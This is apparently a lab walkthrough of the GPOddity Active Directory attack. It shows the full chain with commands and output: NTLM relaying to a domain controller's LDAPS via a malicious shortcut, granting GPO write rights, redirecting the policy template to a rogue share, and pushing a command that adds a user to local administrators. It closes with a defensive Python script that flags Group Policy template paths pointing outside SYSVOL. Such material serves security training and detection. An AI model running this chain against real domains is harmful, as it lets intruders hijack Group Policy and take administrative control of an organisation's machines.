GPOddity

GPOddity combines NTLM relaying with the modification of a GPO:

- The target user has WriteDACL over a GPO
- Relay credentials of the target user to modify the path of the GP template (gPCFileSysPath)
- Load a malicious template from an attacker-controlled location

The target user has WriteDACL over a GPO:

```
# Get GPO's details with PowerView
> Get-DomainGPO -identity "DevOps Policy"
displayname : DevOps Policy
name : {0BF8D01C-1F62-4BDC-958C-57140B67D147}
cn : {0BF8D01C-1F62-4BDC-958C-57140B67D147}
objectguid : fc0df125-5e26-4794-93c7-e60c6eecb75f
gpcfilesyspath : \\dollarcorp.moneycorp.local\SysVol\dollarcorp.moneycorp.local\Policies\{0BF8D01C-1F62-4BDC-958C-57140B67D147}
distinguishedname : CN={0BF8D01C-1F62-4BDC-958C-57140B67D147},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
```

Relay the LDAP service on the DC (172.16.2.1) to the attacker's machine (172.16.100.37):
```
sudo impacket-ntlmrelayx -t ldaps://172.16.2.1 -wh 172.16.100.37 --http-port "80,8080" -i -no-smb-server
```

Create a shortcut pointing to the attacker's relay server:
```
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "Invoke-WebRequest -Uri 'http://172.16.100.37' -UseDefaultCredentials"
```

Copy the .LNK file to the target share:

```
> xcopy .\student337.lnk \\dcorp-ci\AI
.\student337.lnk
1 File(s) copied
```

Back on the relay server:
```
[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Connection from 172.16.3.11 controlled, attacking target ldaps://172.16.2.1
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Authenticating against ldaps://172.16.2.1 as DCORP/DEVOPSADMIN SUCCEED
[*] Started interactive Ldap shell via TCP on 127.0.0.1:11000 as DCORP/DEVOPSADMIN
```

Assign WriteDACL permissions over the target GPO to the attacker's domain user:

```
$ nc 127.0.0.1 11000
Type help for list of commands
# whoami
u:dcorp\devopsadmin
# write_gpo_dacl student337 {0BF8D01C-1F62-4BDC-958C-57140B67D147}
Adding student337 to GPO with GUID {0BF8D01C-1F62-4BDC-958C-57140B67D147}
LDAP server claims to have taken the secdescriptor. Have fun
```

Alternatively, if we have not compromised a domain user, we can add a computer object and assign the permissions to it:
```
# add_computer std337-gpattack Secretpass@123
Attempting to add a new computer with the name: std337-gpattack$
Inferred Domain DN: DC=dollarcorp,DC=moneycorp,DC=local
Inferred Domain Name: dollarcorp.moneycorp.local
New Computer DN: CN=std337-gpattack,CN=Computers,DC=dollarcorp,DC=moneycorp,DC=local
Adding new computer with username: std337-gpattack$ and password: Secretpass@123 result: OK
# write_gpo_dacl std337-gpattack$ {0BF8D01C-1F62-4BDC-958C-57140B67D147}
Adding std337-gpattack$ to GPO with GUID {0BF8D01C-1F62-4BDC-958C-57140B67D147}
LDAP server claims to have taken the secdescriptor. Have fun
```

Execute the GPOddity attack:
```
# Create & inject a malicious template
sudo python3 gpoddity.py --gpo-id '0BF8D01C-1F62-4BDC-958C-57140B67D147' --domain 'dollarcorp.moneycorp.local' --username 'student337' --password 'nUQfN3A8CcV7GxqT' --command 'net localgroup administrators student337 /add' --rogue-smbserver-ip '172.16.100.37' --rogue-smbserver-share 'std337-gp' --dc-ip '172.16.2.1' --smb-mode none
```

Create the share and move the malicious template to it:
```
# Create the share
mkdir /mnt/c/AD/Tools/std337-gp
# Move the template to the share
cp -r /mnt/c/AD/Tools/GPOddity/GPT_out/* /mnt/c/AD/Tools/std337-gp/
```

From a SYSTEM shell, configure the share's path and permissions:
```
# Configure the share path
C:\Windows\system32>net share std337-gp=c:\AD\Tools\std337-gp
std337-gp was shared successfully.
# Provide full control to everyone
C:\Windows\system32>icacls "C:\AD\Tools\std337-gp" /grant Everyone:F /T
```

Check the policy's attribute with PowerView:
```
> Get-DomainGPO -identity "DevOps Policy" | select gpcfilesyspath
gpcfilesyspath
--------------
\\172.16.100.37\std337-gp
```

When the policy refreshes:
```
# Check admin access with PowerView
> Find-LocalAdminAccess
dcorp-adminsrv.dollarcorp.moneycorp.local
dcorp-ci.dollarcorp.moneycorp.local
dcorp-std337.dollarcorp.moneycorp.local
```
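The PowerView check above shows the tell-tale artifact of this attack: a gPCFileSysPath that no longer points into the domain's SYSVOL. As an added defensive check (not part of this page or of the GPOddity tool), the following Python audits each GPO's gPCFileSysPath against its canonical location, \\<domain>\SysVol\<domain>\Policies\{GUID}; the GPO records are constructed inline (the first two mirror the before/after state of "DevOps Policy" on this page, the third uses a made-up GUID mismatch), and in practice you would feed it the output of Get-DomainGPO or an LDAP query.

```python
import re

DOMAIN = "dollarcorp.moneycorp.local"

# Constructed sample records: the first two mirror the before/after state of
# "DevOps Policy" shown above; the third has a made-up GUID in the template
# folder that does not match the GPO object's name.
SAMPLE_GPOS = [
    {"displayname": "DevOps Policy",
     "name": "{0BF8D01C-1F62-4BDC-958C-57140B67D147}",
     "gpcfilesyspath": r"\\dollarcorp.moneycorp.local\SysVol\dollarcorp.moneycorp.local\Policies\{0BF8D01C-1F62-4BDC-958C-57140B67D147}"},
    {"displayname": "DevOps Policy (after GPOddity)",
     "name": "{0BF8D01C-1F62-4BDC-958C-57140B67D147}",
     "gpcfilesyspath": r"\\172.16.100.37\std337-gp"},
    {"displayname": "Default Domain Policy (constructed mismatch)",
     "name": "{31B2F340-016D-11D2-945F-00C04FB984F9}",
     "gpcfilesyspath": r"\\dollarcorp.moneycorp.local\sysvol\dollarcorp.moneycorp.local\Policies\{DEADBEEF-0000-0000-0000-000000000000}"},
]

# \\host\share[\subpath]; all comparisons are case-insensitive, like SMB and AD.
UNC_RE = re.compile(r"\\\\(?P<host>[^\\]+)\\(?P<share>[^\\]+)(?:\\(?P<subpath>.*))?")


def audit_gpo_path(gpo, domain):
    """Return findings for one GPO; an empty list means the path is canonical."""
    path = gpo["gpcfilesyspath"]
    m = UNC_RE.fullmatch(path)
    if not m:
        return ["gPCFileSysPath is not a UNC path: %s" % path]
    host, share, subpath = m["host"], m["share"], m["subpath"] or ""
    findings = []
    if host.lower() != domain.lower():
        findings.append("template host '%s' is not the domain '%s'" % (host, domain))
    if share.lower() != "sysvol":
        findings.append("template share '%s' is not SysVol" % share)
    expected = "%s\\Policies\\%s" % (domain, gpo["name"])
    if subpath.lower() != expected.lower():
        findings.append("template folder '%s' != expected '%s'" % (subpath, expected))
    return findings


def audit_all(gpos, domain):
    """Map display name -> findings, keeping only GPOs with at least one."""
    return {g["displayname"]: f for g in gpos if (f := audit_gpo_path(g, domain))}


if __name__ == "__main__":
    for name, findings in audit_all(SAMPLE_GPOS, DOMAIN).items():
        print(name)
        for f in findings:
            print("  -", f)
```

A hit on the host or share check is the GPOddity signature (template served from outside SYSVOL); a hit only on the folder check points at a GPO whose object and template folder have drifted apart and deserves a manual look.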